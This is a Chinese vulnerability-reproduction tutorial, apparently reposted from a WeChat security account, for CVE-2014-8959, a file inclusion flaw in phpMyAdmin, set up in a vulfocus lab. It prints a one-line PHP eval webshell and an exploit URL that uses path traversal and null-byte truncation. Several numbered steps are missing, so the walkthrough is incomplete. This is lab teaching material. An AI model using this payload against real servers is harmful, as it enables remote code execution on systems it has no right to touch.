01
漏洞描述
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。
漏洞利用有两个前提:
1. 能登陆phpMyAdmin,满足phpmyadmin的安全检查
2. 需要截断,需要满足下面的要求之一
① PHP的版本需要小于 5.3.4 且gpc关闭
② 利用长文件名截断
02
漏洞环境
latest :
80 vulfocus/phpmyadmin-cve_2014_8959:latest :
03
漏洞复现
测试账号:pmatest:pmatest
1、使用测试账号登录PHPmyadmin,phpMyAdmin地址:
http://ip:port/pma
3、漏洞环境所在的服务器内置了一张木马,内容如下
<?php
@eval($_POST[a]);
?>
http://<IP>/pma/gis_data_editor.php?token=effa7667f41b469bde9c43d6e814f9a4&&gis_data[gis_type]=/../../../../1.gif%00
参数内也可以传入其他任意php代码
6、如果该服务器内有其他文件,同样可以被包含
04
漏洞修复
建议更新至最新版本
往期回顾
如有侵权,请联系删除。
扫码关注我们
查看更多精彩内容
原文始发于微信公众号(长风实验室):教程 | CVE-2014-8959 phpMyAdmin任意文件包含
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论